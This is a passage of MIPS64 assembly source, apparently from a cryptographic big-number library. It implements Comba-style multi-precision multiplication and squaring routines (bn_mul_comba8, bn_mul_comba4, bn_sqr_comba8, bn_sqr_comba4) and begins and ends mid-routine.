daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_3,b_2 /* mul_add_c(a[3],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_4,b_1 /* mul_add_c(a[4],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,b_0 /* mul_add_c(a[5],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0) /* r[5]=c3; */
dmultu a_6,b_0 /* mul_add_c(a[6],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_5,b_1 /* mul_add_c(a[5],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,b_2 /* mul_add_c(a[4],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,b_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_2,b_4 /* mul_add_c(a[2],b[4],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_1,b_5 /* mul_add_c(a[1],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_0,b_6 /* mul_add_c(a[0],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,48(a0) /* r[6]=c1; */
dmultu a_0,b_7 /* mul_add_c(a[0],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_1,b_6 /* mul_add_c(a[1],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,b_5 /* mul_add_c(a[2],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_3,b_4 /* mul_add_c(a[3],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_4,b_3 /* mul_add_c(a[4],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_5,b_2 /* mul_add_c(a[5],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_6,b_1 /* mul_add_c(a[6],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_7,b_0 /* mul_add_c(a[7],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,56(a0) /* r[7]=c2; */
dmultu a_7,b_1 /* mul_add_c(a[7],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_6,b_2 /* mul_add_c(a[6],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,b_3 /* mul_add_c(a[5],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_4,b_4 /* mul_add_c(a[4],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_3,b_5 /* mul_add_c(a[3],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_2,b_6 /* mul_add_c(a[2],b[6],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_1,b_7 /* mul_add_c(a[1],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,64(a0) /* r[8]=c3; */
dmultu a_2,b_7 /* mul_add_c(a[2],b[7],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_3,b_6 /* mul_add_c(a[3],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,b_5 /* mul_add_c(a[4],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_5,b_4 /* mul_add_c(a[5],b[4],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_6,b_3 /* mul_add_c(a[6],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_7,b_2 /* mul_add_c(a[7],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,72(a0) /* r[9]=c1; */
dmultu a_7,b_3 /* mul_add_c(a[7],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_6,b_4 /* mul_add_c(a[6],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_5,b_5 /* mul_add_c(a[5],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_4,b_6 /* mul_add_c(a[4],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_3,b_7 /* mul_add_c(a[3],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,80(a0) /* r[10]=c2; */
dmultu a_4,b_7 /* mul_add_c(a[4],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_5,b_6 /* mul_add_c(a[5],b[6],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_6,b_5 /* mul_add_c(a[6],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_7,b_4 /* mul_add_c(a[7],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,88(a0) /* r[11]=c3; */
dmultu a_7,b_5 /* mul_add_c(a[7],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_6,b_6 /* mul_add_c(a[6],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_5,b_7 /* mul_add_c(a[5],b[7],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,96(a0) /* r[12]=c1; */
dmultu a_6,b_7 /* mul_add_c(a[6],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_7,b_6 /* mul_add_c(a[7],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,104(a0) /* r[13]=c2; */
dmultu a_7,b_7 /* mul_add_c(a[7],b[7],c3,c1,c2); */
ld s0,0(sp)
ld s1,8(sp)
ld s2,16(sp)
ld s3,24(sp)
ld s4,32(sp)
ld s5,40(sp)
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sd c_3,112(a0) /* r[14]=c3; */
sd c_1,120(a0) /* r[15]=c1; */
PTR_ADD sp,FRAME_SIZE
jr ra
END(bn_mul_comba8)
.align 5
LEAF(bn_mul_comba4)
.set reorder
ld a_0,0(a1)
ld b_0,0(a2)
ld a_1,8(a1)
ld a_2,16(a1)
dmultu a_0,b_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
ld a_3,24(a1)
ld b_1,8(a2)
ld b_2,16(a2)
ld b_3,24(a2)
mflo c_1
mfhi c_2
sd c_1,0(a0)
dmultu a_0,b_1 /* mul_add_c(a[0],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu c_3,t_2,AT
dmultu a_1,b_0 /* mul_add_c(a[1],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
sd c_2,8(a0)
dmultu a_2,b_0 /* mul_add_c(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
dmultu a_1,b_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_0,b_2 /* mul_add_c(a[0],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0)
dmultu a_0,b_3 /* mul_add_c(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_1,b_2 /* mul_add_c(a[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_2,b_1 /* mul_add_c(a[2],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,b_0 /* mul_add_c(a[3],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0)
dmultu a_3,b_1 /* mul_add_c(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_2,b_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_1,b_3 /* mul_add_c(a[1],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0)
dmultu a_2,b_3 /* mul_add_c(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_3,b_2 /* mul_add_c(a[3],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0)
dmultu a_3,b_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sd c_1,48(a0)
sd c_2,56(a0)
jr ra
END(bn_mul_comba4)
#undef a_4
#undef a_5
#undef a_6
#undef a_7
#define a_4 b_0
#define a_5 b_1
#define a_6 b_2
#define a_7 b_3
.align 5
LEAF(bn_sqr_comba8)
.set reorder
ld a_0,0(a1)
ld a_1,8(a1)
ld a_2,16(a1)
ld a_3,24(a1)
dmultu a_0,a_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
ld a_4,32(a1)
ld a_5,40(a1)
ld a_6,48(a1)
ld a_7,56(a1)
mflo c_1
mfhi c_2
sd c_1,0(a0)
dmultu a_0,a_1 /* mul_add_c2(a[0],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu c_3,t_2,AT
sd c_2,8(a0)
dmultu a_2,a_0 /* mul_add_c2(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_1,a_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0)
dmultu a_0,a_3 /* mul_add_c2(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_1,a_2 /* mul_add_c2(a[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0)
dmultu a_4,a_0 /* mul_add_c2(a[4],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_3,a_1 /* mul_add_c2(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,a_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0)
dmultu a_0,a_5 /* mul_add_c2(a[0],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_1,a_4 /* mul_add_c2(a[1],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_2,a_3 /* mul_add_c2(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0)
dmultu a_6,a_0 /* mul_add_c2(a[6],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_5,a_1 /* mul_add_c2(a[5],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,a_2 /* mul_add_c2(a[4],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,a_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,48(a0)
dmultu a_0,a_7 /* mul_add_c2(a[0],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_1,a_6 /* mul_add_c2(a[1],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,a_5 /* mul_add_c2(a[2],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_3,a_4 /* mul_add_c2(a[3],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,56(a0)
dmultu a_7,a_1 /* mul_add_c2(a[7],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_6,a_2 /* mul_add_c2(a[6],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,a_3 /* mul_add_c2(a[5],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_4,a_4 /* mul_add_c(a[4],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,64(a0)
dmultu a_2,a_7 /* mul_add_c2(a[2],b[7],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,a_6 /* mul_add_c2(a[3],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,a_5 /* mul_add_c2(a[4],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,72(a0)
dmultu a_7,a_3 /* mul_add_c2(a[7],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_6,a_4 /* mul_add_c2(a[6],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_5,a_5 /* mul_add_c(a[5],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,80(a0)
dmultu a_4,a_7 /* mul_add_c2(a[4],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,a_6 /* mul_add_c2(a[5],b[6],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,88(a0)
dmultu a_7,a_5 /* mul_add_c2(a[7],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_6,a_6 /* mul_add_c(a[6],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,96(a0)
dmultu a_6,a_7 /* mul_add_c2(a[6],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,104(a0)
dmultu a_7,a_7 /* mul_add_c(a[7],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sd c_3,112(a0)
sd c_1,120(a0)
jr ra
END(bn_sqr_comba8)
.align 5
LEAF(bn_sqr_comba4)
.set reorder
ld a_0,0(a1)
ld a_1,8(a1)
ld a_2,16(a1)
ld a_3,24(a1)
dmultu a_0,a_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
mflo c_1
mfhi c_2
sd c_1,0(a0)
dmultu a_0,a_1 /* mul_add_c2(a[0],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu c_3,t_2,AT
sd c_2,8(a0)
dmultu a_2,a_0 /* mul_add_c2(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
